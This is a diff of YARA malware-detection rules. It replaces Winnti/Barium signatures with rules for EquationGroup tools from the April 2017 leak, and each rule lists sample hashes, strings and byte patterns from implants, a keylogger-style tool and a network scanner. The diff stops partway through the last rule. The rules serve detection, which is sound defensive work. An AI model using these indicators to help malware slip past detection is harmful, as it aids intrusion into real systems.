+		hash6 = "87fdc6c32b9aa8ae97c7efbbd5c9ae8ec5595079fc1488f433beef658efcb4e9"
+		hash7 = "722f034ba634f45c429c7dafdbff413c08976b069a6b30ec91bfa5ce2e4cda26"
+		hash8 = "d94b99908f528fa4deb56b11eac29f6a6e244a7b3aac36b11b807f2f74c6d8be"
+		hash9 = "4b07d9d964b2c0231c1db7526237631bb83d0db80b3c9574cc414463703462d3"
+		hash10 = "30b63abde1e871c90df05137ec08df3fa73dedbdb39cb4bd2a2df4ca65bc4e53"
+		hash11 = "02c1b08224b7ad4ac3a5b7b8e3268802ee61c1ec30e93e392fa597ae3acc45f7"
+		hash12 = "690f09859ddc6cd933c56b9597f76e18b62a633f64193a51f76f52f67bc2f7f0"
 
 	strings:
-		$c1 = "'Wymajtec$Tima Stempijg Sarviges GA -$G2" fullword ascii
-		$c2 = "AHDNEAFE1.sys" fullword ascii
-		$c3 = "SOTEFEHJ3.sys" fullword ascii
-		$c4 = "MainSYS64.sys" fullword ascii
-		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" wide
-		$s2 = "Update.dll" fullword ascii
-		$s3 = "\\\\.\\pipe\\usbpcex%d" fullword wide
-		$s4 = "\\\\.\\pipe\\usbpcg%d" fullword wide
-		$s5 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" wide
-		$s6 = "\\??\\pipe\\usbpcg%d" fullword wide
-		$s7 = "\\??\\pipe\\usbpcex%d" fullword wide
-		$s8 = "HOST: %s" fullword ascii
-		$s9 = "$$$--Hello" fullword ascii
+		$s1 = "Logon failed.  Kerberos ticket not yet valid (target and KDC times not synchronized)" fullword ascii
+		$s2 = "[-] Could not set \"CredentialType\"" fullword ascii
+		$op1 = { 46 83 c4 0c 83 fe 0c 0f 8c 5e ff ff ff b8 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( 1 of ( $c* ) and 3 of ( $s* ) ) or all of ( $s* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 150KB and 2 of them )
 }
-rule SIGNATURE_BASE_Winnti_Malware_FWPK : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Yak : FILE
 {
 	meta:
-		description = "Detects a Winnti malware - FWPKCLNT.SYS"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "591ad72d-b9d4-5cd9-9103-37e001026610"
-		date = "2015-10-10"
-		modified = "2023-01-06"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L90-L117"
+		id = "e5562d1a-7980-5fb8-b098-2e26003fb159"
+		date = "2017-04-15"
+		modified = "2023-12-05"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2054-L2070"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "6e87b06f6bf11dceb04c8eb4910f5d98ec3fe430fa984eeed8b73e99b28c5abe"
+		logic_hash = "69b9514508f557376d876262793e5650289abfeeeee8b5ca9beaf42f3ec4d64c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "1098518786c84b0d31f215122275582bdcd1666653ebc25d50a142b4f5dabf2c"
-		hash2 = "9a684ffad0e1c6a22db1bef2399f839d8eff53d7024fb014b9a5f714d11febd7"
-		hash3 = "a836397817071c35e24e94b2be3c2fa4ffa2eb1675d3db3b4456122ff4a71368"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "66ff332f84690642f4e05891a15bf0c9783be2a64edb2ef2d04c9205b47deb19"
 
 	strings:
-		$s0 = "\\Registry\\Machine\\System\\CurrentControlSet\\Control\\Class\\{4D36E972-E325-11CE-BFC1-08002BE10318}\\" wide
-		$s1 = "%x:%d->%x:%d, Flag %s%s%s%s%s, seq %u, ackseq %u, datalen %u" fullword ascii
-		$s2 = "FWPKCLNT.SYS" fullword ascii
-		$s3 = "Port Layer" fullword wide
-		$s4 = "%x->%x, icmp type %d, code %d" fullword ascii
-		$s5 = "\\BaseNamedObjects\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28E}" wide
-		$s6 = "\\Ndi\\Interfaces" wide
-		$s7 = "\\Device\\{93144EB0-8E3E-4591-B307-8EEBFE7DB28F}" wide
-		$s8 = "Bad packet" fullword ascii
-		$s9 = "\\BaseNamedObjects\\EKV0000000000" wide
-		$s10 = "%x->%x" fullword ascii
-		$s11 = "IPInjectPkt" fullword ascii
+		$x1 = "-xd = dump archive data & store in scancodes.txt" fullword ascii
+		$x2 = "-------- driver start token -------" fullword wide
+		$x3 = "-------- keystart token -------" fullword wide
+		$x4 = "-xta = same as -xt but show special chars & store in keys_all.txt" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 642KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 800KB and 2 of them )
 }
-rule SIGNATURE_BASE_Winnti_Malware_Streamportal_Gen : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Aduser_Implant : FILE
 {
 	meta:
-		description = "Detects a Winnti malware - Streamportal"
+		description = "Detects EquationGroup Tool - April Leak"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f9d31d6b-a6f7-5359-b741-960b678e0b9c"
-		date = "2015-10-10"
+		id = "4ba152c8-aa81-5558-8ad3-c62aa3231dab"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "VTI research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L119-L141"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2072-L2086"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "249f51b263fbcab650983d75482fd4787934731e415fcbd0e6f6925032aac690"
+		logic_hash = "d378773f4acd850e5a8d92d6cce84d57f659330edc025565cf4bc34afb0a6ae6"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "326e2cabddb641777d489a9e7a39d52c0dc2dcb1fde1762554ea162792056b6e"
-		hash2 = "9001572983d5b1f99787291edaadbb65eb2701722f52470e89db2c59def24672"
-		hash3 = "aff7c7478fe33c57954b6fec2095efe8f9edf5cdb48a680de9439ba62a77945f"
+		hash1 = "fd2efb226969bc82e2e38769a10a8a751138db69f4594a8de4b3c0522d4d885f"
 
 	strings:
-		$s0 = "Proxies destination address/port for TCP" fullword wide
-		$s3 = "\\Device\\StreamPortal" wide
-		$s4 = "Transport-Data Proxy Sub-Layer" fullword wide
-		$s5 = "Cookie: SN=" fullword ascii
-		$s6 = "\\BaseNamedObjects\\_transmition_synchronization_" wide
-		$s17 = "NTOSKRNL.EXE" fullword wide
-		$s19 = "FwpsReferenceNetBufferList0" fullword ascii
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$s2 = "(&(objectCategory=person)(objectClass=user)(cn=" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 275KB and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-
-rule SIGNATURE_BASE_WINNTI_Kingsoft_Moz_Confustion : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remoteexecute_Implant : FILE
 {
 	meta:
-		description = "Detects Barium sample with Copyright confusion"
-		author = "Markus Neis"
-		id = "0c45c1ff-6734-504f-91d1-cf5d6744252f"
-		date = "2018-04-13"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "5fa5ff71-42fa-58e2-a826-341fb73ea08a"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.virustotal.com/en/file/070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496/analysis/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L143-L159"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2088-L2112"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ebd8465f484e1142ac741263282ea1c6f98e6bd0637ebdcec6ecc6233193407e"
+		logic_hash = "aa46cb188ba820199c013633ade72ab1c8bea316384042e9e3b5098c439841a5"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "070ee4a40852b26ec0cfd79e32176287a6b9d2b15e377281d8414550a83f6496"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "770663c07c519677316934cf482e500a73540d9933342c425f3e56258e6e6d8b"
+
+	strings:
+		$op1 = { 53 00 63 00 68 00 65 00 64 00 75 00 6C 00 65 00
+               00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00
+               65 00 73 00 41 00 63 00 74 00 69 00 76 00 65 00
+               00 00 00 00 FF FF FF FF 00 00 00 00 B0 17 00 68
+               5C 00 70 00 69 00 70 00 65 00 5C 00 53 00 65 00
+               63 00 6F 00 6E 00 64 00 61 00 72 00 79 00 4C 00
+               6F 00 67 00 6F 00 6E 00 00 00 00 00 5C 00 00 00
+               57 00 69 00 6E 00 53 00 74 00 61 00 30 00 5C 00
+               44 00 65 00 66 00 61 00 75 00 6C 00 74 00 00 00
+               6E 00 63 00 61 00 63 00 6E 00 5F 00 6E 00 70 00
+               00 00 00 00 5C 00 70 00 69 00 70 00 65 00 5C 00
+               53 00 45 00 43 00 4C 00 4F 00 47 00 4F 00 4E }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( pe.imphash ( ) == "7f01b23ccfd1017249c36bc1618d6892" or ( pe.version_info [ "LegalCopyright" ] contains "Mozilla Corporation" and pe.version_info [ "ProductName" ] contains "Kingsoft" ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 40KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_1 : FILE
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Banner_Implant9X : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "322e9362-bfb6-55e3-9a93-d54246311d11"
-		date = "2019-12-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7cbb509e-2a91-5e3c-8d19-61fda797cd8c"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L160-L176"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2114-L2129"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "9e26a642cfe143b8efc52b2b9789c2ec54592f6347f16fb8716912767e4f9879"
+		logic_hash = "5bda7b8ab097c0a5ca90b05147d4227e5a03735b99633b5081d80d2d72bceba9"
 		score = 75
 		quality = 85
 		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "5d69a8cfc9b636448f023fcf18d111f13a8e6bcb9a693eb96276e0d796ab4e0c"
 
 	strings:
-		$e1 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii nocase
-		$e2 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii nocase
-		$e3 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii nocase
-		$e4 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
-		$e5 = "BFE_Notify_Event_{7D00FA3C-FBDC-4A8D-AEEB-3F55A4890D2A}" nocase
+		$s1 = ".?AVFeFinallyFailure@@" fullword ascii
+		$op1 = { c9 c3 57 8d 85 2c eb ff ff }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( any of ( $e* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 20KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_2
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Greatdoc_Dll_Config : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "77f2cb7d-90a6-5654-9d2e-6b525cd910a2"
-		date = "2019-12-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "592e4e40-f5cd-5a11-8a1b-0cdcf6f267ec"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L178-L201"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2131-L2147"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "216557999b7100f26556f9f7088b16ba125ac39b308cb77c997d620ce9591d24"
+		logic_hash = "edb14cc9e51bbf6b3ca2c52f841edfa3df1ca89b3e7c1b5a59baf3a13be0fc46"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "fd9d0abfa727784dd07562656967d220286fc0d63bcf7e2c35d4c02bc2e5fc2e"
 
 	strings:
-		$a1 = "IPSecMiniPort" wide fullword
-		$a2 = "ndis6fw" wide fullword
-		$a3 = "TCPIP" wide fullword
-		$a4 = "NDIS.SYS" ascii fullword
-		$a5 = "ntoskrnl.exe" ascii fullword
-		$a6 = "\\BaseNamedObjects\\{B2B87CCA-66BC-4C24-89B2-C23C9EAC2A66}" wide
-		$a7 = "\\Device\\Null" wide
-		$a8 = "\\Device" wide
-		$a9 = "\\Driver" wide
-		$b1 = { 66 81 7? ?? 70 17 }
-		$b2 = { 81 7? ?? 07 E0 15 00 }
-		$b3 = { 8B 46 18 3D 03 60 15 00 }
+		$x1 = "C:\\Projects\\GREATERDOCTOR\\trunk\\GREATERDOCTOR" ascii
+		$x2 = "src\\build\\Release\\dllConfig\\dllConfig.pdb" ascii
+		$x3 = "GREATERDOCTOR [ commandline args configuration ]" fullword ascii
+		$x4 = "-useage: <scanner> \"<cmdline args>\"" fullword ascii
 
 	condition:
-		(6 of ( $a* ) ) and ( 2 of ( $b* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_3
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Scanner : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "2e001c91-0794-5940-ad8c-8e58a01e100c"
-		date = "2019-12-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "603c82d0-2e65-5353-a109-5f69697cffa4"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L203-L219"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2149-L2166"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d09f948c9bf685de64e8a6f1c95d95b806651866f3364d5d9b8b2351c1a68be3"
+		logic_hash = "7f2ee4ac260b78764573187c501ed27fbfdf573e618f15dbd307177afa670605"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f180bdb247687ea9f1b58aded225d5c80a13327422cd1e0515ea891166372c53"
 
 	strings:
-		$b1 = { 0F B7 ?? 16 [0-1] (81 E? | 25) 00 20 [0-2] [8] 8B ?? 50 41 B9 40 00 00 00 41 B8 00 10 00 00 }
-		$b2 = { 8B 40 28 [5-8] 48 03 C8 48 8B C1 [5-8] 48 89 41 28 }
-		$b3 = { 48 6B ?? 28 [5-8] 8B ?? ?? 10 [5-8] 48 6B ?? 28 [5-8] 8B ?? ?? 14 }
-		$b4 = { 83 B? 90 00 00 00 00 0F 84 [9-12] 83 B? 94 00 00 00 00 0F 84 }
-		$b5 = { (45 | 4D) (31 | 33) C0 BA 01 00 00 00 [10-16] FF 5? 28 [0-1] (84 | 85) C0 }
+		$x1 = "+daemon_version,system,processor,refid,clock" fullword ascii
+		$x2 = "Usage: %s typeofscan IP_address" fullword ascii
+		$x3 = "# scanning ip  %d.%d.%d.%d" fullword ascii
+		$x4 = "Welcome to the network scanning tool" fullword ascii
+		$x5 = "***** %s ***** (length %d)" fullword ascii
 
 	condition:
-		(4 of ( $b* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 90KB and 1 of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_4
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Mcl_Ntmemory_Std : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "1f7ac215-d049-5b97-9797-9589a70cbf2b"
-		date = "2019-12-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "608218a8-7642-5ec4-8c07-87248649f022"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L221-L235"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2168-L2183"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "32909e915a6e602ad1e8698cf5c128c2e54670770b97f54b1414c5798c42cc00"
+		logic_hash = "5d3c76cf0ca0f798e1ca3c0a1b88c3bb425f1c36439842c4c33247dfcb44a877"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "087db4f2dbf8e0679de421fec8fb2e6dd50625112eb232e4acc1408cc0bcd2d7"
 
 	strings:
-		$b1 = { 4C 8D 41 24 33 D2 B9 03 00 1F 00 FF 9? F8 00 00 00 48 85 C0 74 }
-		$b2 = { 4C 8B 4? 08 BA 01 00 00 00 49 8B C? FF D0 85 C0 [2-6] C7 4? 1C 01 00 00 00 B8 01 00 00 00 }
-		$b3 = { 8B 4B E4 8B 53 EC 41 B8 00 40 00 00 4? 0B C? FF 9? B8 00 00 00 EB }
+		$op1 = { 44 24 37 50 c6 44 24 38 72 c6 44 }
+		$op2 = { 44 24 33 6f c6 44 24 34 77 c6 }
+		$op3 = { 3b 65 c6 44 24 3c 73 c6 44 24 3d 73 c6 44 24 3e }
 
 	condition:
-		(2 of ( $b* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 300KB and all of them )
 }
-rule SIGNATURE_BASE_APT_Winnti_MAL_Dec19_5
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Tacothief : FILE
 {
 	meta:
-		description = "Detects Winnti malware"
-		author = "Unknown"
-		id = "2a8f28e6-5a01-5a2f-b89b-9c34163afcda"
-		date = "2019-12-06"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7be7ca05-c2c7-5a7d-8b1b-e6741b4397b9"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.verfassungsschutz.de/download/broschuere-2019-12-bfv-cyber-brief-2019-01.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L237-L264"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2185-L2198"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "977d11fbb7cf4678d4da179c43d5566520ee97ac528e269a9b985e5bc75641b7"
+		logic_hash = "565d94ac0dd65de0926d11ae08ee78f14dcb211ca97c77c39f394fb36890fc6f"
 		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "c71953cc84c27dc61df8f6f452c870a7880a204e9e21d9fd006a5c023b052b35"
 
 	strings:
-		$a1 = "-k netsvcs" ascii
-		$a2 = "svchost.exe" ascii fullword
-		$a3 = "%SystemRoot%\\System32\\ntoskrnl.exe" ascii
-		$a4 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411015}" ascii
-		$a5 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411014}" ascii
-		$a6 = "Global\\BFE_Notify_Event_{65a097fe-6102-446a-9f9c-55dfc3f411016}" ascii
-		$a7 = "cmd.exe" wide
-		$a8 = ",XML" wide
-		$a9 = "\\rundll32.exe" wide
-		$a10 = "\\conhost.exe" wide
-		$a11 = "\\cmd.exe" wide
-		$a12 = "NtQueryInformationProcess" ascii
-		$a13 = "Detours!" ascii fullword
-		$a14 = "Loading modified build of detours library designed for MPC-HC player (http://sourceforge.net/projects/mpc-hc/)" ascii
-		$a15 = "CONOUT$" wide fullword
-		$a16 = { C6 0? E9 4? 8? 4? 05 [2] 89 4? 01 }
+		$x1 = "File too large!  Must be less than 655360 bytes." fullword ascii
 
 	condition:
-		(12 of ( $a* ) )
+		( uint16( 0 ) == 0x5a4d and filesize < 100KB and all of them )
 }
-rule SIGNATURE_BASE_APT_CN_Group_Loader_Jan20_1
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Ntevt : FILE
 {
 	meta:
-		description = "Detects loaders used by Chinese groups"
-		author = "Vitali Kremez"
-		id = "c85ae499-4f76-56ff-877d-887e1a7fc077"
-		date = "2020-02-01"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "fd25f703-ff3e-5e75-b1eb-24a658a1ac8e"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/VK_Intel/status/1223411369367785472?s=20"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L266-L278"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2200-L2219"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "30a180ada2390ca8df4bf7883624a5a176249622b4c34ce96931fe62b09ea8e3"
-		score = 80
+		logic_hash = "29572cce9af51adf12db019f885f868fd77ff9034a6944a6286a4d2a0988842a"
+		score = 75
 		quality = 85
-		tags = ""
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4254ee5e688fc09bdc72bcc9c51b1524a2bb25a9fb841feaf03bc7ec1a9975bf"
 
 	strings:
-		$xc1 = { 8B C3 C1 E3 10 C1 E8 10 03 D8 6B DB 77 83 C3 13 }
+		$x1 = "c:\\ntevt.pdb" fullword ascii
+		$s1 = "ARASPVU" fullword ascii
+		$op1 = { 41 5a 41 59 41 58 5f 5e 5d 5a 59 5b 58 48 83 c4 }
+		$op2 = { f9 48 03 fa 48 33 c0 8a 01 49 03 c1 49 f7 e0 88 }
+		$op3 = { 01 41 f6 e0 49 03 c1 88 01 48 33 }
 
 	condition:
-		1 of them
+		( uint16( 0 ) == 0x5a4d and filesize < 700KB and $x1 or 3 of them )
 }
-rule SIGNATURE_BASE_Winnti_Dropper_X64_Libtomcrypt_Fns : TAU CN APT
+rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Processes_Target : FILE
 {
 	meta:
-		description = "Designed to catch winnti 4.0 loader and hack tool x64"
-		author = "CarbonBlack Threat Research"
-		id = "080d837c-248f-5718-b4a2-290495cd3b38"
-		date = "2019-08-26"
+		description = "Detects EquationGroup Tool - April Leak"
+		author = "Florian Roth (Nextron Systems)"
+		id = "1b910f46-5d19-5ecd-9647-10ee9ee7b012"
+		date = "2017-04-15"
 		modified = "2023-12-05"
-		reference = "https://www.carbonblack.com/2019/09/04/cb-tau-threat-intelligence-notification-winnti-malware-4-0/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_winnti.yar#L280-L327"
+		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_eqgrp_apr17.yar#L2221-L2236"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "39d23f2a12a3b78182e52847e2fdb2d09386765138c37eb7f75edfc680505531"
+		logic_hash = "e9e26224b7eafc999c9638d4591a45297e3293b0e90e63c2d207ee52848c4ce2"
 		score = 75
-		quality = 83
-		tags = "TAU, CN, APT"
-		rule_version = 1
-		yara_version = "3.8.1"
-		Confidence = "Prod"
-		Priority = "High"
-		TLP = "White"
-		exemplar_hashes = "5ebf39d614c22e750bb8dbfa3bcb600756dd3b36929755db9b577d2b653cd2d1"
-		sample_md5 = "794E127D627B3AF9015396810A35AF1C"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "69cf7643dbecc5f9b4b29edfda6c0295bc782f0e438f19be8338426f30b4cc74"
 
 	strings:
-		$0x140001820 = { 48 83 EC 28 83 3D ?? ?? ?? ?? 00 }
-		$0x140001831 = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x140001842 = { B8 0B 00 E0 0C 48 83 C4 28 C3 }
-		$0x14000184c = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x140001881 = { B8 0C 00 E0 0C 48 83 C4 28 C3 }
-		$0x14000188b = { 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 F8 FF }
-		$0x1400018e4 = { B8 0D 00 E0 0C 48 83 C4 28 C3 }
-		$0x1400018ee = { 48 8D 0D ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 41 B8 A0 01 00 00 E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? 01 00 00 00 }
-		$0x140001911 = { 33 C0 48 83 C4 28 C3 }
